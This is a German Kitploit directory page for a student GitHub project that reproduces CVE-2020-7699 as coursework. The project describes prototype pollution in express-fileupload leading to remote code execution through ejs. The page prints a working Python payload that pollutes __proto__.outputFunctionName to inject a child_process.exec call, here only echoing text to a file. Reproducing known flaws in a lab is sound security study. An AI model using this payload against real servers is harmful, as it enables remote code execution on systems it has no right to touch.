Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-7699_reproduce — Reproduktion von CVE-2020-7699, große Kursarbeit für das Fach Prinzipien der Softwaresicherheit. | Kitploit
Tools/GitHubGitHub/zodiac12-pub/cve-2020-7699_reproduce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungPayload-EntwicklungLabs & Praxis
GitHubzodiac12-pub/cve-2020-7699_reproduce

CVE-2020-7699_reproduce

Reproduktion von CVE-2020-7699, große Kursarbeit für das Fach Prinzipien der Softwaresicherheit.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 4 JahrenNoch nicht geprüft

CVE-2020-7699 Reproduktion

Reproduktion der Node.js RCE-Sicherheitslücke (CVE-2020-7699), meine Laborarbeit

Einrichtung

Node.js-Version: v14.16.1, bitte stellen Sie sicher, dass die Node.js-Version 14 ist (Andere Versionen funktionieren wahrscheinlich, habe ich nicht getestet)

Python-Version:3.9.5, Python wird nur zum Senden von HTTP-Angriffsanfragen verwendet, keine bestimmte Version erforderlich

Einfach das Repository clonen, npm i zum Installieren der Abhängigkeiten. Ich habe 2 weitere Befehle bereitgestellt:

  • mit npm run start-server den Zielserver starten (Opfer-Server)
  • mit npm run launch-attack den Angriff starten

Analyse

express-fileUpload: Versionen unter 1.1.10 sind betroffen

In express-fileUpload existiert Prototyp-Verschmutzung

Sicherheitslücke: express-fileUpload Prototyp-Verschmutzung

Wie man sie ausnutzt: Verschmutze __proto__.outputFunctionName, um den auszuführenden Befehl zu schreiben. z.B. echo "ATTACK SUCCESSFUL" > attacked.txt

root@kitploit:~
exec_command = "echo \"ATTACK SUCCESSFUL\" > attacked.txt"

{
    "__proto__.outputFunctionName": (
        None,
        f"x;process.mainModule.require('child_process').exec('{exec_command}');x"
    )
}

In ejs existiert RCE

Sicherheitslücke: ejs versucht, xxx.outputFunctionName auszuführen, was undefined ist, aber wenn object.outputFunctionName verschmutzt ist, wird stattdessen dieses ausgeführt

Tool herunterladen